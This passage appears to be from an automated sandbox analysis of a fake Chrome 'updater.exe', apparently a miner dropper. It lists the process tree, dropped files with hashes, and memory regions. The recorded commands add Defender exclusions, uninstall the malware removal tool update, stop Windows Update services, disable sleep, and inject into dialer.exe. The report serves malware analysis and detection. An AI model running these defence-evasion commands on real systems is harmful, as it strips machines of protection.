                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:3748
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3940
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3852
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:2620
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                          1⤵
                                                                                                            PID:4532
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                            1⤵
                                                                                                              PID:1456
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                              1⤵
                                                                                                                PID:4744
                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                1⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1988
                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4268
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                  1⤵
                                                                                                                    PID:2996
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                    1⤵
                                                                                                                      PID:5056
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                      1⤵
                                                                                                                        PID:3196
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1772
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:1364
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:3168
                                                                                                                          • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                            C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                            1⤵
                                                                                                                            • Drops file in Drivers directory
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5044
                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                              2⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3352
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:5020
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                2⤵
                                                                                                                                  PID:2384
                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                    3⤵
                                                                                                                                      PID:3108
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                    2⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:1592
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                    2⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:1692
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                    2⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:2264
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                                                    2⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:796
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      3⤵
                                                                                                                                        PID:1012
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                      2⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:740
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                      2⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2940
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        3⤵
                                                                                                                                          PID:1744
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                        2⤵
                                                                                                                                        • Power Settings
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2976
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          3⤵
                                                                                                                                            PID:1316
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                          2⤵
                                                                                                                                          • Power Settings
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2256
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                          2⤵
                                                                                                                                          • Power Settings
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2856
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            3⤵
                                                                                                                                              PID:1532
                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                                            2⤵
                                                                                                                                              PID:1936
                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:2284
                                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                                dialer.exe
                                                                                                                                                2⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:692
                                                                                                                                            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:4472

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\ProgramData\Google\Chrome\updater.exe

                                                                                                                                                Filesize

                                                                                                                                                15.9MB

                                                                                                                                                MD5

                                                                                                                                                d3c16cede9b6e4ee304a0184328d313d

                                                                                                                                                SHA1

                                                                                                                                                bd82838a3cc343956ecce4d5051b510dd941de11

                                                                                                                                                SHA256

                                                                                                                                                e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c

                                                                                                                                                SHA512

                                                                                                                                                284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eey13r5g.fet.ps1

                                                                                                                                                Filesize

                                                                                                                                                60B

                                                                                                                                                MD5

                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                SHA1

                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                SHA256

                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                SHA512

                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                SHA1

                                                                                                                                                445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                SHA256

                                                                                                                                                3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                SHA512

                                                                                                                                                42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                1KB

                                                                                                                                                MD5

                                                                                                                                                b42c70c1dbf0d1d477ec86902db9e986

                                                                                                                                                SHA1

                                                                                                                                                1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                                                                                                                                SHA256

                                                                                                                                                8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                                                                                                                                SHA512

                                                                                                                                                57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                                                                                                                              • C:\Windows\system32\drivers\etc\hosts

                                                                                                                                                Filesize

                                                                                                                                                3KB

                                                                                                                                                MD5

                                                                                                                                                8d346e67fe454926c9be4324ada55a7f

                                                                                                                                                SHA1

                                                                                                                                                b75f48371401e1a22f475ea5ebc212168cb3b6d6

                                                                                                                                                SHA256

                                                                                                                                                b0d81bc6e9ed18f4b19f3057d3c1b6ef65eaec17c7e27031a67c3220ee487c21

                                                                                                                                                SHA512

                                                                                                                                                e719a64ec49c0859d8611446a8ce9376d61ce9302bc78faa0f22dc6b775d3c0eb6aa5c293f8df8bf409861ae19f2ffa9e80e3a2cea6312f60aa70d3ae3e4181a

                                                                                                                                              • memory/612-81-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/612-80-0x0000021082860000-0x000002108288B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/612-73-0x0000021082860000-0x000002108288B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/612-72-0x0000021082830000-0x0000021082855000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                148KB

                                                                                                                                              • memory/612-74-0x0000021082860000-0x000002108288B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/672-85-0x000002A488660000-0x000002A48868B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/672-91-0x000002A488660000-0x000002A48868B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/672-92-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/936-96-0x00000282937A0000-0x00000282937CB000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/936-103-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/936-102-0x00000282937A0000-0x00000282937CB000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/1016-107-0x0000016957AC0000-0x0000016957AEB000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/1992-53-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/1992-61-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/1992-69-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/1992-51-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/1992-52-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/1992-62-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.0MB

                                                                                                                                              • memory/1992-63-0x00007FFA4B860000-0x00007FFA4B91E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                760KB

                                                                                                                                              • memory/1992-54-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/2152-50-0x00007FFA4B860000-0x00007FFA4B91E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                760KB

                                                                                                                                              • memory/2152-49-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.0MB

                                                                                                                                              • memory/2152-48-0x0000022AEC620000-0x0000022AEC64A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/3344-22-0x00007FFA2E420000-0x00007FFA2EEE1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/3344-18-0x00007FFA2E420000-0x00007FFA2EEE1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/3344-8-0x0000027E69800000-0x0000027E69822000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/3344-7-0x00007FFA2E423000-0x00007FFA2E425000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/3344-19-0x00007FFA2E420000-0x00007FFA2EEE1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/3352-424-0x00000199F7870000-0x00000199F7925000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                724KB

                                                                                                                                              • memory/3352-809-0x00000199F7B20000-0x00000199F7B3A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                104KB

                                                                                                                                              • memory/3352-812-0x00000199F7AD0000-0x00000199F7ADA000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/3352-811-0x00000199F7AC0000-0x00000199F7AC6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                24KB

                                                                                                                                              • memory/3352-810-0x00000199F7A90000-0x00000199F7A98000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/3352-808-0x00000199F7A80000-0x00000199F7A8A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/3352-543-0x00000199F7AA0000-0x00000199F7ABC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                112KB

                                                                                                                                              • memory/3352-469-0x00000199F7930000-0x00000199F793A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/3352-413-0x00000199F54D0000-0x00000199F54EC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                112KB

                                                                                                                                              • memory/3860-27-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/3860-26-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/3860-24-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/3860-25-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/3860-29-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/4612-31-0x00007FF67DB60000-0x00007FF67F762000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                28.0MB

                                                                                                                                              • memory/4612-6-0x00007FF67DB60000-0x00007FF67F762000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                28.0MB

                                                                                                                                              • memory/4612-0-0x00007FF67E0AD000-0x00007FF67E781000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.8MB

                                                                                                                                              • memory/4612-32-0x00007FF67E0AD000-0x00007FF67E781000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.8MB

                                                                                                                                              • memory/4612-5-0x00007FF67E0AD000-0x00007FF67E781000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.8MB

                                                                                                                                              • memory/4612-2-0x00007FF67DB60000-0x00007FF67F762000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                28.0MB

                                                                                                                                              • memory/4612-1-0x00007FFA4D3D0000-0x00007FFA4D3D2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/5044-44-0x00007FFA4D3D0000-0x00007FFA4D3D2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/5044-45-0x00007FF6023D0000-0x00007FF603FD2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                28.0MB